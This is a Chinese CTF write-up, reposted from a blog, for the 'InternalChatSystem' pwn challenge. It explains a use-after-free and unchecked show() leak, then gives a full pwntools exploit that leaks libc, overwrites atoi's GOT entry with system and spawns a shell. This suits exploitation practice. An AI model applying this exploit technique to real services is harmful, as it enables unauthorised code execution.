internal chat圣诞欢乐赛

internal chat

拿到题目后，先查看其开启的保护：

很容易联想到覆写got表来getshell

首先注册一个用户，用户的结构体如下：

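/* Per-user record as recovered from the binary (IDA-style types). */
struct user
{
    char *user_name;          /* presumably heap-allocated with the size given at registration ("Input your name size") -- confirm */
    __int64 age;
    char description[0x100];  /* fixed 0x100-byte inline buffer */
    _QWORD *addr;             /* purpose not shown on this page */
    _QWORD *friend_addr;      /* presumably the friend link managed by add/delete -- confirm */
    __int64 flag;             /* marks whether this user was deleted; per the write-up it is
                                 overlapped by the next chunk's prev_size once the struct is freed */
};  /* the original listing lacked the closing ';' */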

漏洞点在于 add_delete 部分：删除用户结构体后指针没有置 0，产生悬空指针（UAF）。并且 flag 字段会被下一个 chunk 的 prev_size 覆盖，造成该字段始终有值的情况。

leak_libc

我们首先删除用户；show 处没有检查该用户是否已被删除，仍会打印用户的信息，从中可以获取 libc 地址。

覆写atoi地址

再注册一个用户，设置用户名称大小为 0x128，这样名称的地址即为一个用户结构体的地址；将 atoi 的 GOT 表地址写在 name 地址上，再通过泄露的 libc 地址计算出 atoi 的地址，登录被删除的第一个用户。再修改 name，即可把 GOT 表内容改为 system，从而 getshell。

exp

from pwn import *
from LibcSearcher import *
# Verbose pwntools I/O logging so every prompt/reply exchange is visible.
context.log_level='debug'
# ELF view of the target, used below for GOT lookups (elf.got[...]).
elf=ELF('./InternalChatSystem')
# The process tube every helper below talks to.
p=process('./InternalChatSystem')
def debug(addr):
    """Attach gdb to the module-level tube ``p`` with a breakpoint at ``addr``.

    ``addr`` may be an int or a string; it is rendered with ``%s`` (same as
    ``str``) into the gdb command ``b *<addr>``.
    """
    gdb.attach(p, "b *%s" % (addr,))
def register(name_size,name,age,payload):
    """Register a new user through menu option 2 on the module-level tube ``p``.

    Answers the binary's prompts in order: name size, name, age, description.
    ``name_size`` and ``age`` are stringified; ``name`` and ``payload`` are
    sent verbatim (each followed by a newline).
    """
    # (prompt, reply) pairs in the order the binary asks for them.
    dialogue = [
        ("Your choice:", "2"),
        ("Input your name size:", str(name_size)),
        ("Input your name:", name),
        ("Input your age:", str(age)),
        ("Input your description:", payload),  # description<=0x100
    ]
    for prompt, reply in dialogue:
        p.recvuntil(prompt)
        p.sendline(reply)
def login(name):
    """Log in as ``name`` via menu option 1 (module-level tube ``p``).

    ``name`` is sent verbatim followed by a newline; callers may pass raw
    bytes (e.g. a packed pointer) as well as text.
    """
    p.sendlineafter("Your choice:", "1")
    p.sendlineafter("Please input your user name:", name)
def send_message(name,title,content):
    """Send a message to user ``name`` via menu option 4.

    The menu choice and recipient go out with a trailing newline; ``title``
    and ``content`` are sent raw (no newline appended), so the caller
    controls their exact length.
    """
    p.sendlineafter("Your choice:", '4')
    p.sendlineafter("Which user do you want to send a msg to:", name)
    p.sendafter("Input your message title:", title)
    p.sendafter("Input your content:", content)
def delete(name):
    """Remove ``name`` from the friend list: menu option 3, then answer 'd'.

    Mirrors ``add`` except for the final a/d answer.  Uses the module-level
    tube ``p``.
    """
    prompts = (
        "Your choice:",
        "Input the friend's name:",
        "So..Do u want to add or delete this friend?(a/d)",
    )
    replies = ("3", name, "d")
    for prompt, reply in zip(prompts, replies):
        p.recvuntil(prompt)
        p.sendline(reply)
def add(name):
    """Add ``name`` to the friend list: menu option 3, then answer 'a'.

    Mirrors ``delete`` except for the final a/d answer.  Uses the
    module-level tube ``p``.
    """
    p.sendlineafter("Your choice:", "3")
    p.sendlineafter("Input the friend's name:", name)
    p.sendlineafter("So..Do u want to add or delete this friend?(a/d)", "a")
def show():
    """Select menu option 1 on ``p``.

    The write-up uses this after logging in to print the user's fields;
    the caller reads the output itself.
    """
    p.sendlineafter("Your choice:", "1")
def out():
    """Select menu option 6 on ``p``.

    Named ``out`` by the author and called before registering a second
    user, so presumably a log-out -- confirm against the binary's menu.
    """
    p.sendlineafter("Your choice:", "6")
def change(name,age,description):
    """Update name, age and description via menu option 2 (author's naming).

    Unlike the other helpers every reply here is sent with ``send`` -- no
    newline appended -- so callers pass exactly the bytes they want consumed.
    ``age`` is stringified first.
    """
    exchange = (
        ("Your choice:", "2"),
        ("Input your name:", name),
        ("Input your age:", str(age)),
        ("Input your description:", description),
    )
    for prompt, reply in exchange:
        p.sendafter(prompt, reply)

# NOTE(review): root cause per the write-up above -- the user pointer is not
# cleared on delete and show() does not check the deleted flag.  Clearing the
# record on delete and validating `flag` before printing would close both.

# --- setup: create a user with a message and a friend entry, then delete it ---
register(0x60,'aaaaaa',30,'1'*0x16)
login('aaaaaa')
send_message('aaaaaa','\x01'*32,'\x02'*32)
add('aaaaaa')
#debug(0x400f51)
delete("aaaaaa")
#debug(0)
# --- leak: show() still prints the deleted user; the "Age:" field is read as
#     12 hex digits and treated as main_arena+88 (the author's constant, which
#     depends on the libc build) ---
show()
p.recvuntil("Age:")
main_arena=int(p.recv(12),16)-88
malloc_hook=main_arena-0x10
print hex(main_arena)

# --- resolve libc symbols from the leaked __malloc_hook address ---
libc=LibcSearcher('__malloc_hook',malloc_hook)
libc_base=malloc_hook-libc.dump('__malloc_hook')
atoi_addr=libc_base+libc.dump('atoi')
system_addr=libc_base+libc.dump('system')
#0choice

print hex(atoi_addr)
print hex(elf.got['atoi'])
# --- GOT overwrite, as described in the prose above: a 0x128-byte name
#     lands on the freed user record, so its name field holds atoi's GOT
#     address; logging in as the deleted user and changing the name then
#     rewrites atoi@got ---
out()
register(0x128,p64(elf.got['atoi']),30,'1'*4)
login(p64(atoi_addr))
change(p64(system_addr),18,'a')
# Menu input is now routed through the overwritten entry; sent twice
# (send, then sendline) -- presumably so one of them is consumed as a line.
p.recvuntil("Your choice:")
p.send('/bin/sh')
p.recvuntil("Your choice:")
p.sendline('/bin/sh')
p.interactive()


转载自blog.csdn.net/qq_39268483/article/details/103844074